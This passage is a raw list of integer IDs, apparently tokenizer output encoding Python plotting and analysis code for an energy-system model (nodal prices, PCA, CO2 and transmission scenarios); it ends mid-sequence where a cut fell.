23064,
28,
17821,
11,
4217,
28,
17,
8,
1303,
5647,
7839,
198,
21928,
19160,
796,
2393,
58,
1065,
21912,
1415,
60,
1343,
366,
532,
9794,
287,
9766,
66,
2882,
357,
7645,
16725,
198,
16928,
43328,
7,
5647,
11,
3108,
31077,
11,
3613,
19160,
8,
198,
198,
2,
28114,
1487,
287,
9766,
66,
10156,
198,
5647,
7839,
796,
366,
19400,
287,
8744,
2882,
355,
257,
2163,
286,
11478,
32315,
1,
198,
5647,
796,
9794,
31077,
28827,
66,
7,
50033,
31077,
28827,
66,
11,
23064,
28,
25101,
11,
4217,
28,
21,
8,
1303,
5647,
7839,
198,
21928,
19160,
796,
2393,
58,
1065,
21912,
1415,
60,
1343,
366,
532,
9794,
287,
9766,
66,
2882,
598,
357,
7645,
16725,
198,
16928,
43328,
7,
5647,
11,
3108,
31077,
11,
3613,
19160,
8,
628,
198,
2,
28114,
1487,
287,
9766,
66,
44829,
590,
2882,
198,
5647,
7839,
796,
366,
19400,
287,
8744,
44829,
590,
2882,
355,
257,
2163,
286,
11478,
32315,
1,
198,
5647,
796,
9794,
31077,
34,
709,
7,
50033,
31077,
28827,
66,
11,
23064,
28,
17821,
11,
4217,
28,
17,
8,
1303,
5647,
7839,
198,
21928,
19160,
796,
2393,
58,
1065,
21912,
1415,
60,
1343,
366,
532,
9794,
287,
9766,
66,
39849,
2882,
357,
7645,
16725,
198,
16928,
43328,
7,
5647,
11,
3108,
31077,
11,
3613,
19160,
8,
198,
198,
2,
28114,
1487,
287,
9766,
66,
44829,
590,
2882,
198,
5647,
7839,
796,
366,
19400,
287,
8744,
44829,
590,
2882,
355,
257,
2163,
286,
11478,
32315,
1,
198,
5647,
796,
9794,
31077,
34,
709,
7,
50033,
31077,
28827,
66,
11,
23064,
28,
25101,
11,
4217,
28,
21,
8,
1303,
5647,
7839,
198,
21928,
19160,
796,
2393,
58,
1065,
21912,
1415,
60,
1343,
366,
532,
9794,
287,
9766,
66,
39849,
2882,
598,
357,
7645,
16725,
198,
16928,
43328,
7,
5647,
11,
3108,
31077,
11,
3613,
19160,
8,
198,
198,
2,
28114,
1487,
287,
44829,
590,
198,
5647,
7839,
796,
366,
19400,
287,
8744,
44829,
590,
355,
257,
2163,
286,
11478,
32315,
1,
198,
5647,
796,
9794,
34,
709,
2743,
590,
7,
50033,
34,
709,
2743,
590,
28827,
66,
11,
2824,
15156,
907,
28,
17821,
11,
23064,
28,
17821,
11,
4217,
28,
17,
8,
1303,
5647,
7839,
198,
21928,
19160,
796,
2393,
58,
1065,
21912,
1415,
60,
1343,
366,
532,
9794,
287,
9766,
66,
44829,
590,
357,
7645,
16725,
198,
16928,
43328,
7,
5647,
11,
3108,
34,
709,
2743,
590,
11,
3613,
19160,
8,
198,
198,
2,
28114,
1487,
287,
44829,
590,
198,
5647,
7839,
796,
366,
19400,
287,
8744,
44829,
590,
355,
257,
2163,
286,
11478,
32315,
1,
198,
5647,
796,
9794,
34,
709,
2743,
590,
7,
50033,
34,
709,
2743,
590,
28827,
66,
11,
2824,
15156,
907,
28,
17821,
11,
23064,
28,
25101,
11,
4217,
28,
21,
8,
1303,
5647,
7839,
198,
21928,
19160,
796,
2393,
58,
1065,
21912,
1415,
60,
1343,
366,
532,
9794,
287,
9766,
66,
44829,
590,
598,
357,
7645,
16725,
198,
16928,
43328,
7,
5647,
11,
3108,
34,
709,
2743,
590,
11,
3613,
19160,
8,
628,
198,
2,
16626,
198,
198,
29113,
29113,
7804,
4242,
2235,
198,
29113,
29113,
7804,
4242,
2235,
198,
198,
29113,
399,
3727,
1847,
4810,
8476,
1303,
29113,
198,
198,
29113,
29113,
7804,
4242,
2235,
198,
29113,
29113,
7804,
4242,
2235,
198,
198,
2,
9220,
1438,
198,
7753,
796,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
2713,
13,
71,
20,
1,
198,
198,
2,
17267,
3127,
198,
27349,
796,
12972,
862,
64,
13,
26245,
7,
34945,
10,
7753,
8,
198,
198,
2,
3497,
262,
3891,
286,
262,
1366,
198,
7890,
36690,
796,
3127,
13,
65,
2664,
13,
9630,
13,
2536,
13,
48369,
7,
15,
11,
17,
737,
34642,
3419,
198,
198,
2,
41436,
6329,
9347,
4217,
28114,
357,
28827,
66,
1343,
12308,
8,
41436,
2,
198,
2,
10644,
284,
3613,
21528,
198,
6978,
796,
3785,
15235,
1343,
366,
45,
375,
282,
7886,
6852,
13912,
4217,
6852,
1,
198,
198,
2,
11420,
15987,
66,
11420,
198,
2,
29431,
329,
8744,
329,
1123,
1499,
357,
49343,
284,
8576,
10432,
14,
44,
1199,
8,
198,
20888,
28827,
66,
796,
25853,
18124,
7,
27349,
13,
65,
2664,
62,
83,
13,
30887,
1292,
62,
20888,
58,
7890,
36690,
4357,
49669,
8,
198,
198,
2,
4217,
32,
319,
18666,
282,
4536,
329,
8744,
198,
68,
9324,
40161,
28827,
66,
11,
304,
9324,
53,
478,
669,
28827,
66,
11,
24198,
18438,
1328,
28827,
66,
11,
2593,
34184,
28827,
66,
11,
13368,
293,
66,
796,
4217,
32,
7,
20888,
28827,
66,
8,
198,
198,
2,
28114,
3975,
4217,
329,
8744,
18666,
282,
4536,
198,
7839,
43328,
28827,
66,
796,
366,
45,
375,
282,
2756,
329,
8744,
691,
1,
198,
1640,
1312,
287,
45941,
13,
283,
858,
7,
21,
2599,
198,
220,
220,
220,
2336,
796,
34645,
7,
68,
9324,
53,
478,
669,
28827,
66,
11,
304,
9324,
40161,
28827,
66,
11,
1366,
36690,
11,
357,
72,
1343,
352,
828,
7857,
2625,
24132,
4943,
2,
11,
3670,
43328,
28827,
66,
11,
3670,
8979,
5376,
8,
198,
220,
220,
220,
3670,
796,
357,
7753,
58,
1065,
21912,
18,
60,
1343,
366,
532,
9347,
4217,
15987,
66,
28498,
357,
50033,
366,
1343,
965,
7,
72,
10,
16,
8,
1343,
366,
8,
4943,
198,
220,
220,
220,
12793,
43328,
7,
5647,
11,
3108,
11,
3670,
8,
628,
198,
2,
220,
22369,
376,
9792,
28114,
357,
28827,
66,
1343,
12308,
8,
41436,
6329,
2,
198,
2,
10644,
284,
3613,
376,
9792,
21528,
198,
6978,
796,
3785,
15235,
1343,
366,
45,
375,
282,
7886,
6852,
5777,
51,
6852,
1,
198,
198,
2,
11420,
15987,
66,
11420,
198,
7753,
62,
3672,
796,
366,
44132,
414,
399,
375,
282,
7886,
532,
366,
1343,
2393,
198,
1640,
1312,
287,
45941,
13,
283,
858,
7,
21,
2599,
198,
220,
220,
220,
2336,
796,
376,
9792,
43328,
7,
9328,
293,
66,
13,
51,
11,
24198,
18438,
1328,
28827,
66,
11,
4217,
62,
15285,
796,
1312,
10,
16,
11,
3670,
28,
7753,
62,
3672,
8,
198,
220,
220,
220,
3670,
796,
357,
7753,
58,
1065,
21912,
18,
60,
1343,
366,
532,
376,
9792,
15987,
66,
28498,
357,
50033,
366,
1343,
965,
7,
72,
10,
16,
8,
1343,
366,
8,
4943,
198,
220,
220,
220,
12793,
43328,
7,
5647,
11,
3108,
11,
3670,
8,
628,
198,
2,
41436,
6329,
7369,
282,
28114,
357,
28827,
66,
1343,
12308,
8,
220,
22369,
2,
198,
2,
10644,
284,
3613,
21819,
21528,
198,
6978,
796,
3785,
15235,
1343,
366,
45,
375,
282,
7886,
6852,
18960,
282,
6852,
1,
198,
198,
2,
11420,
15987,
66,
11420,
198,
7753,
62,
3672,
796,
366,
44132,
414,
399,
375,
282,
7886,
532,
366,
1343,
2393,
198,
1640,
1312,
287,
45941,
13,
283,
858,
7,
21,
2599,
198,
220,
220,
220,
2336,
796,
1622,
43328,
7,
9328,
293,
66,
11,
640,
15732,
11,
4217,
62,
15285,
16193,
72,
10,
16,
828,
4217,
62,
17287,
28,
21,
11,
3670,
28,
7753,
62,
3672,
8,
198,
220,
220,
220,
3670,
796,
357,
7753,
58,
1065,
21912,
18,
60,
1343,
366,
532,
7369,
282,
28114,
15987,
66,
28498,
357,
50033,
366,
1343,
965,
7,
72,
10,
16,
8,
1343,
366,
8,
4943,
198,
220,
220,
220,
12793,
43328,
7,
5647,
11,
3108,
11,
3670,
8,
198,
198,
2,
41436,
376,
9792,
1343,
7369,
282,
28114,
357,
28827,
66,
8,
41436,
12,
2,
198,
2,
10644,
284,
3613,
21819,
21528,
198,
6978,
796,
3785,
15235,
1343,
366,
45,
375,
282,
7886,
6852,
28595,
10640,
6852,
1,
198,
198,
2,
11420,
15987,
66,
11420,
198,
7753,
62,
3672,
796,
366,
44132,
414,
399,
375,
282,
7886,
532,
366,
1343,
2393,
198,
1640,
1312,
287,
45941,
13,
283,
858,
7,
21,
2599,
198,
220,
220,
220,
2336,
796,
376,
9792,
6230,
43328,
7,
9328,
293,
66,
11,
640,
15732,
11,
24198,
18438,
1328,
28827,
66,
11,
4217,
62,
15285,
16193,
72,
10,
16,
828,
4217,
62,
17287,
28,
21,
11,
67,
14415,
28,
2167,
8,
198,
220,
220,
220,
3670,
796,
357,
7753,
58,
1065,
21912,
18,
60,
1343,
366,
532,
3782,
10640,
28114,
15987,
66,
28498,
357,
50033,
366,
1343,
965,
7,
72,
10,
16,
8,
1343,
366,
8,
4943,
198,
220,
220,
220,
12793,
43328,
7,
5647,
11,
3108,
11,
3670,
8,
198,
198,
2,
34400,
6329,
4217,
16,
290,
4217,
17,
5929,
7110,
357,
28827,
66,
8,
41436,
1303,
198,
2,
10644,
284,
3613,
10156,
21528,
198,
6978,
796,
3785,
15235,
1343,
366,
45,
375,
282,
7886,
6852,
20575,
1389,
28114,
6852,
1,
198,
198,
2,
11420,
15987,
66,
11420,
220,
198,
5647,
796,
4217,
16,
392,
17,
43328,
353,
7,
9328,
293,
66,
11,
640,
15732,
11,
685,
16,
11,
17,
4357,
304,
9324,
40161,
28827,
66,
11,
37456,
5216,
12609,
3103,
28827,
66,
11,
37456,
5216,
12609,
4965,
28827,
66,
11,
39849,
46912,
28827,
66,
11,
47,
4177,
2981,
2625,
19419,
16775,
295,
4943,
2,
11,
2385,
457,
2578,
28,
7203,
44132,
414,
337,
1042,
963,
532,
366,
1343,
2393,
58,
1065,
21912,
18,
46570,
67,
14415,
28,
2167,
8,
198,
7839,
796,
357,
7753,
58,
1065,
21912,
18,
60,
1343,
366,
532,
32028,
28114,
15987,
66,
28498,
357,
50033,
352,
1222,
362,
8,
4943,
198,
16928,
43328,
7,
5647,
11,
3108,
11,
3670,
8,
198,
198,
2,
16626,
198,
2,
41436,
438,
2409,
7110,
7375,
17,
32315,
220,
22369,
6329,
1303,
198,
2,
10644,
284,
3613,
2318,
21528,
198,
6978,
796,
3785,
15235,
1343,
366,
45,
375,
282,
7886,
6852,
10374,
6852,
1,
198,
198,
2,
6530,
286,
2393,
357,
27238,
307,
287,
3376,
9483,
4067,
8,
198,
34345,
62,
8220,
17,
796,
14631,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
21,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
20,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
19,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
18,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
17,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
16,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
2713,
13,
71,
20,
8973,
198,
198,
2,
35748,
284,
3650,
18666,
282,
2756,
4217,
7515,
5907,
329,
1123,
3127,
198,
5657,
46912,
8220,
17,
28827,
66,
796,
17635,
198,
198,
2,
35748,
284,
3650,
18666,
282,
2756,
1612,
290,
3210,
12291,
198,
32604,
18124,
28827,
66,
796,
17635,
198,
19282,
5308,
272,
18124,
28827,
66,
796,
17635,
198,
40972,
576,
5308,
272,
18124,
28827,
66,
796,
17635,
198,
40972,
576,
9452,
18124,
28827,
66,
796,
17635,
198,
198,
1640,
2393,
287,
29472,
62,
8220,
17,
25,
198,
220,
220,
220,
1303,
7311,
198,
220,
220,
220,
3127,
796,
12972,
862,
64,
13,
26245,
7,
34945,
1343,
2393,
8,
628,
220,
220,
220,
1303,
3497,
262,
3891,
286,
262,
1366,
198,
220,
220,
220,
1366,
36690,
796,
3127,
13,
65,
2664,
13,
9630,
13,
2536,
13,
48369,
7,
15,
11,
17,
737,
34642,
3419,
198,
220,
220,
220,
220,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
11420,
15987,
66,
11420,
198,
220,
220,
220,
1303,
29431,
329,
8744,
329,
1123,
1499,
357,
49343,
284,
8576,
10432,
14,
44,
1199,
8,
198,
220,
220,
220,
2756,
28827,
66,
796,
25853,
18124,
7,
27349,
13,
65,
2664,
62,
83,
13,
30887,
1292,
62,
20888,
58,
7890,
36690,
4357,
49669,
8,
628,
220,
220,
220,
1303,
4217,
32,
319,
18666,
282,
4536,
329,
8744,
198,
220,
220,
220,
304,
9324,
40161,
28827,
66,
11,
304,
9324,
53,
478,
669,
28827,
66,
11,
24198,
18438,
1328,
28827,
66,
11,
2593,
34184,
28827,
66,
11,
13368,
293,
66,
796,
4217,
32,
7,
20888,
28827,
66,
8,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
2034,
437,
1988,
284,
17593,
198,
220,
220,
220,
2318,
46912,
8220,
17,
28827,
66,
13,
33295,
7,
25641,
590,
18438,
1328,
28827,
66,
8,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
41436,
6329,
28498,
22728,
357,
28827,
66,
8,
41436,
2,
198,
220,
220,
220,
1303,
11420,
15987,
66,
11420,
198,
220,
220,
220,
1303,
22728,
2756,
329,
1499,
198,
220,
220,
220,
949,
18124,
796,
2756,
28827,
66,
13,
1084,
22446,
32604,
3419,
198,
220,
220,
220,
1612,
18124,
796,
2756,
28827,
66,
13,
32604,
22446,
32604,
3419,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
24443,
949,
11,
3509,
290,
1612,
284,
17593,
198,
220,
220,
220,
1612,
18124,
28827,
66,
13,
33295,
26933,
1084,
18124,
11,
1612,
18124,
12962,
198,
220,
220,
220,
220,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
41436,
6329,
28498,
16972,
576,
357,
28827,
66,
8,
41436,
2,
198,
220,
220,
220,
1303,
11420,
15987,
66,
11420,
198,
220,
220,
220,
1303,
22728,
2756,
329,
1499,
198,
220,
220,
220,
5554,
576,
9452,
18124,
796,
45941,
13,
40972,
576,
7,
20888,
28827,
66,
13,
1084,
22784,
58,
15,
13,
2713,
11,
15,
13,
1495,
11,
15,
13,
2425,
11,
15,
13,
3865,
12962,
198,
220,
220,
220,
5554,
576,
5308,
272,
18124,
796,
45941,
13,
40972,
576,
7,
20888,
28827,
66,
13,
32604,
22784,
58,
15,
13,
2713,
11,
15,
13,
1495,
11,
15,
13,
2425,
11,
15,
13,
3865,
12962,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
24443,
949,
11,
3509,
290,
1612,
284,
17593,
198,
220,
220,
220,
5554,
576,
5308,
272,
18124,
28827,
66,
13,
33295,
7,
40972,
576,
5308,
272,
18124,
8,
198,
220,
220,
220,
5554,
576,
9452,
18124,
28827,
66,
13,
33295,
7,
40972,
576,
9452,
18124,
8,
198,
220,
220,
220,
220,
628,
198,
1102,
2536,
6003,
796,
14631,
1821,
4,
1600,
366,
1120,
4,
1600,
366,
1899,
4,
1600,
366,
2154,
4,
1600,
366,
1795,
4,
1600,
366,
3829,
4,
1600,
366,
3865,
4,
8973,
198,
7839,
796,
13538,
1303,
1,
15057,
286,
4217,
12059,
24198,
286,
3127,
355,
257,
2163,
286,
720,
8220,
23330,
17,
92,
3,
32315,
1,
198,
87,
18242,
796,
13538,
1303,
1,
3,
8220,
23330,
17,
92,
3,
32315,
1,
628,
198,
2385,
457,
2578,
28827,
66,
796,
13538,
1303,
7203,
44132,
414,
399,
375,
282,
7886,
532,
366,
1343,
2393,
58,
1065,
21912,
1415,
12962,
198,
5647,
796,
31597,
7,
5657,
46912,
8220,
17,
28827,
66,
11,
767,
11,
29472,
62,
8220,
17,
11,
17778,
11,
3670,
11,
2124,
18242,
11,
424,
457,
2578,
28827,
66,
11,
10369,
7857,
28,
1507,
11,
2336,
7857,
41888,
21,
11,
513,
4357,
299,
4033,
28,
19,
11,
275,
3524,
16193,
15,
13,
20,
12095,
15,
13,
2078,
4008,
198,
7839,
10374,
8220,
17,
28827,
66,
796,
357,
7753,
58,
1065,
21912,
1415,
60,
1343,
366,
532,
2409,
7375,
17,
15987,
66,
28498,
4943,
198,
16928,
43328,
7,
5647,
11,
3108,
11,
3670,
10374,
8220,
17,
28827,
66,
8,
198,
198,
2,
41436,
6329,
7886,
5418,
1009,
357,
28827,
66,
8,
41436,
2,
198,
6978,
796,
3785,
15235,
1343,
366,
45,
375,
282,
7886,
6852,
18124,
15815,
6852,
1,
198,
7839,
796,
220,
13538,
1303,
7203,
44132,
414,
399,
375,
282,
7886,
26439,
1009,
532,
366,
220,
1343,
2393,
58,
1065,
21912,
1415,
12962,
198,
5647,
796,
7886,
15200,
2122,
7,
32604,
18124,
28827,
66,
11,
40972,
576,
5308,
272,
18124,
28827,
66,
11,
5554,
576,
9452,
18124,
28827,
66,
11,
3127,
4906,
2625,
14809,
1600,
3670,
28,
7839,
11,
2336,
7857,
41888,
21,
11,
18,
4357,
10369,
7857,
28,
1433,
8,
198,
7839,
796,
220,
357,
7753,
58,
1065,
21912,
1415,
60,
1343,
366,
532,
15987,
66,
28498,
7375,
17,
15815,
4943,
198,
16928,
43328,
7,
5647,
11,
3108,
11,
3670,
8,
628,
198,
198,
2,
34400,
438,
2409,
7110,
41653,
32315,
41436,
6329,
1303,
198,
2,
10644,
198,
6978,
796,
3785,
15235,
1343,
366,
45,
375,
282,
7886,
6852,
10374,
6852,
1,
198,
198,
2,
6530,
286,
2393,
357,
27238,
307,
287,
3376,
9483,
4067,
8,
198,
34345,
62,
7645,
796,
14631,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
62,
15,
13,
2713,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
3312,
1495,
62,
15,
13,
2713,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
2713,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
1495,
62,
15,
13,
2713,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
22318,
62,
15,
13,
2713,
13,
71,
20,
8973,
198,
198,
2,
35748,
284,
3650,
18666,
282,
2756,
4217,
7515,
5907,
329,
1123,
3127,
198,
5657,
46912,
8291,
3411,
28827,
66,
796,
17635,
198,
198,
2,
35748,
284,
3650,
18666,
282,
2756,
1612,
290,
3210,
12291,
198,
32604,
18124,
28827,
66,
796,
17635,
198,
40972,
576,
5308,
272,
18124,
28827,
66,
796,
17635,
198,
40972,
576,
9452,
18124,
28827,
66,
796,
17635,
198,
198,
1640,
2393,
287,
29472,
62,
7645,
25,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
7311,
198,
220,
220,
220,
3127,
796,
12972,
862,
64,
13,
26245,
7,
34945,
1343,
2393,
8,
628,
220,
220,
220,
1303,
3497,
262,
3891,
286,
262,
1366,
198,
220,
220,
220,
1366,
36690,
796,
3127,
13,
65,
2664,
13,
9630,
13,
2536,
13,
48369,
7,
15,
11,
17,
737,
34642,
3419,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
11420,
15987,
66,
11420,
198,
220,
220,
220,
1303,
29431,
329,
8744,
329,
1123,
1499,
357,
49343,
284,
8576,
10432,
14,
44,
1199,
8,
198,
220,
220,
220,
2756,
28827,
66,
796,
25853,
18124,
7,
27349,
13,
65,
2664,
62,
83,
13,
30887,
1292,
62,
20888,
58,
7890,
36690,
4357,
49669,
8,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
4217,
32,
319,
18666,
282,
4536,
329,
8744,
198,
220,
220,
220,
304,
9324,
40161,
28827,
66,
11,
304,
9324,
53,
478,
669,
28827,
66,
11,
24198,
18438,
1328,
28827,
66,
11,
2593,
34184,
28827,
66,
11,
13368,
293,
66,
796,
4217,
32,
7,
20888,
28827,
66,
8,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
2034,
437,
1988,
284,
17593,
198,
220,
220,
220,
2318,
46912,
8291,
3411,
28827,
66,
13,
33295,
7,
25641,
590,
18438,
1328,
28827,
66,
8,
628,
220,
220,
220,
1303,
41436,
6329,
28498,
22728,
357,
28827,
66,
8,
41436,
2,
198,
220,
220,
220,
1303,
11420,
15987,
66,
11420,
198,
220,
220,
220,
1303,
22728,
2756,
329,
1499,
198,
220,
220,
220,
949,
18124,
796,
2756,
28827,
66,
13,
1084,
22446,
32604,
3419,
198,
220,
220,
220,
1612,
18124,
796,
2756,
28827,
66,
13,
32604,
22446,
32604,
3419,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
24443,
949,
11,
3509,
290,
1612,
284,
17593,
198,
220,
220,
220,
1612,
18124,
28827,
66,
13,
33295,
26933,
1084,
18124,
11,
1612,
18124,
12962,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
41436,
6329,
28498,
16972,
576,
357,
28827,
66,
8,
41436,
2,
198,
220,
220,
220,
1303,
11420,
15987,
66,
11420,
198,
220,
220,
220,
1303,
22728,
2756,
329,
1499,
198,
220,
220,
220,
5554,
576,
9452,
18124,
796,
45941,
13,
40972,
576,
7,
20888,
28827,
66,
13,
1084,
22784,
58,
15,
13,
2713,
11,
15,
13,
1495,
11,
15,
13,
2425,
11,
15,
13,
3865,
12962,
198,
220,
220,
220,
5554,
576,
5308,
272,
18124,
796,
45941,
13,
40972,
576,
7,
20888,
28827,
66,
13,
32604,
22784,
58,
15,
13,
2713,
11,
15,
13,
1495,
11,
15,
13,
2425,
11,
15,
13,
3865,
12962,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
24443,
949,
11,
3509,
290,
1612,
284,
17593,
198,
220,
220,
220,
5554,
576,
5308,
272,
18124,
28827,
66,
13,
33295,
7,
40972,
576,
5308,
272,
18124,
8,
198,
220,
220,
220,
5554,
576,
9452,
18124,
28827,
66,
13,
33295,
7,
40972,
576,
9452,
18124,
8,
628,
198,
198,
2,
41436,
6329,
2409,
7110,
357,
28827,
66,
8,
41436,
2,
198,
1102,
2536,
6003,
796,
14631,
28667,
1600,
366,
11297,
1600,
366,
17,
87,
9236,
1600,
366,
19,
87,
9236,
1600,
366,
21,
87,
9236,
8973,
198,
7839,
796,
13538,
1303,
1,
15057,
286,
4217,
12059,
24198,
286,
3127,
355,
257,
2163,
286,
11478,
32315,
1,
198,
87,
18242,
796,
13538,
1303,
1,
8291,
3411,
32315,
1,
628,
198,
2385,
457,
2578,
28827,
66,
796,
13538,
1303,
7203,
44132,
414,
399,
375,
282,
7886,
532,
366,
220,
1343,
2393,
58,
1065,
21912,
1415,
12962,
198,
5647,
796,
31597,
7,
5657,
46912,
8291,
3411,
28827,
66,
11,
767,
11,
29472,
62,
7645,
11,
17778,
11,
3670,
11,
2124,
18242,
11,
424,
457,
2578,
28827,
66,
11,
10369,
7857,
28,
1507,
11,
2336,
7857,
41888,
21,
11,
513,
4357,
299,
4033,
28,
19,
11,
13179,
10779,
1558,
13,
20,
11,
275,
3524,
16193,
15,
13,
20,
12095,
15,
13,
2078,
4008,
198,
7839,
10374,
8291,
3411,
28827,
66,
796,
220,
357,
7753,
58,
1065,
21912,
1415,
60,
1343,
366,
532,
2409,
3602,
15987,
66,
28498,
4943,
198,
16928,
43328,
7,
5647,
11,
3108,
11,
3670,
10374,
8291,
3411,
28827,
66,
8,
198,
198,
2,
41436,
6329,
7886,
5418,
1009,
357,
28827,
66,
8,
41436,
2,
198,
6978,
796,
3785,
15235,
1343,
366,
45,
375,
282,
7886,
6852,
18124,
15815,
6852,
1,
198,
7839,
796,
13538,
1303,
7203,
44132,
414,
399,
375,
282,
7886,
26439,
1009,
532,
366,
220,
1343,
2393,
58,
1065,
21912,
1415,
12962,
198,
5647,
796,
7886,
15200,
2122,
7,
32604,
18124,
28827,
66,
11,
40972,
576,
5308,
272,
18124,
28827,
66,
11,
5554,
576,
9452,
18124,
28827,
66,
11,
3127,
4906,
2625,
14809,
1600,
3670,
28,
7839,
11,
2336,
7857,
41888,
21,
11,
18,
13,
17,
4357,
10369,
7857,
28,
1433,
8,
198,
7839,
796,
220,
357,
7753,
58,
1065,
21912,
1415,
60,
1343,
366,
532,
15987,
66,
28498,
3602,
15815,
4943,
198,
16928,
43328,
7,
5647,
11,
3108,
11,
3670,
8,
198,
198,
2,
16626,
198,
29113,
29113,
7804,
4242,
2235,
198,
29113,
29113,
7804,
4242,
2235,
198,
198,
29113,
2,
1766,
23545,
1303,
29113,
2,
198,
198,
29113,
29113,
7804,
4242,
2235,
198,
29113,
29113,
7804,
4242,
2235,
198,
198,
2,
41436,
1766,
23545,
28114,
357,
28827,
66,
1343,
12308,
8,
41436,
12,
2,
198,
2,
9220,
1438,
198,
7753,
796,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
2713,
13,
71,
20,
1,
198,
198,
2,
17267,
3127,
198,
27349,
796,
12972,
862,
64,
13,
26245,
7,
34945,
10,
7753,
8,
198,
198,
2,
3497,
262,
3891,
286,
262,
1366,
198,
7890,
36690,
796,
3127,
13,
65,
2664,
13,
9630,
13,
2536,
13,
48369,
7,
15,
11,
17,
737,
34642,
3419,
198,
198,
2,
3497,
640,
25560,
198,
2435,
15732,
796,
3127,
13,
46030,
62,
83,
13,
79,
62,
2617,
13,
9630,
198,
198,
2,
10644,
284,
3613,
10156,
21528,
198,
6978,
796,
3785,
15235,
1343,
366,
7222,
23545,
6852,
1,
198,
198,
2,
11420,
15987,
66,
11420,
198,
2,
42048,
3440,
329,
1123,
1499,
198,
2220,
28827,
66,
796,
3127,
13,
46030,
62,
83,
13,
79,
62,
2617,
58,
7890,
36690,
60,
198,
198,
2,
12347,
31392,
5270,
198,
20158,
38825,
796,
3127,
13,
8612,
2024,
62,
83,
13,
79,
58,
7890,
36690,
1343,
366,
6591,
8973,
198,
20158,
38825,
13,
28665,
82,
796,
5270,
38825,
13,
28665,
82,
13,
2536,
13,
48369,
7,
15,
11,
17,
8,
198,
198,
2,
1550,
14640,
2344,
5270,
198,
20158,
2202,
7972,
796,
3127,
13,
8612,
2024,
62,
83,
13,
79,
30109,
19315,
329,
1499,
287,
3127,
13,
8612,
2024,
62,
83,
13,
79,
13,
28665,
82,
611,
366,
261,
7972,
1,
287,
1499,
60,
4083,
8094,
1525,
7,
27349,
13,
8612,
2024,
13,
10885,
13,
2536,
13,
48369,
7,
15,
11,
17,
828,
22704,
28,
16,
737,
16345,
3419,
198,
198,
2,
3242,
14640,
2344,
5270,
198,
2,
4362,
572,
7972,
318,
691,
329,
2310,
2678,
11,
3224,
5050,
423,
284,
307,
9177,
284,
787,
340,
379,
10083,
1899,
2124,
1542,
17593,
198,
2,
13610,
6565,
7177,
286,
10083,
1899,
2124,
1542,
11,
751,
262,
572,
7972,
5270,
290,
4781,
705,
26705,
45,
6,
3815,
13,
198,
20158,
9362,
7972,
796,
279,
67,
13,
6601,
19778,
7,
37659,
13,
9107,
418,
26933,
5774,
1899,
11,
1270,
46570,
9630,
28,
2435,
15732,
11,
15180,
28,
7890,
36690,
8,
198,
20158,
9362,
7972,
15853,
3127,
13,
8612,
2024,
62,
83,
13,
79,
30109,
19315,
329,
1499,
287,
3127,
13,
8612,
2024,
62,
83,
13,
79,
13,
28665,
82,
611,
366,
2364,
7972,
1,
287,
1499,
60,
4083,
8094,
1525,
7,
27349,
13,
8612,
2024,
13,
10885,
13,
2536,
13,
48369,
7,
15,
11,
17,
828,
22704,
28,
16,
737,
16345,
3419,
198,
20158,
9362,
7972,
796,
5270,
9362,
7972,
13,
33491,
7,
37659,
13,
12647,
11,
15,
8,
198,
198,
2,
5564,
49,
10439,
198,
2,
4362,
5564,
49,
318,
691,
329,
2681,
2678,
11,
3224,
5050,
423,
284,
307,
9177,
284,
787,
340,
379,
10083,
1899,
2124,
1542,
17593,
198,
2,
13610,
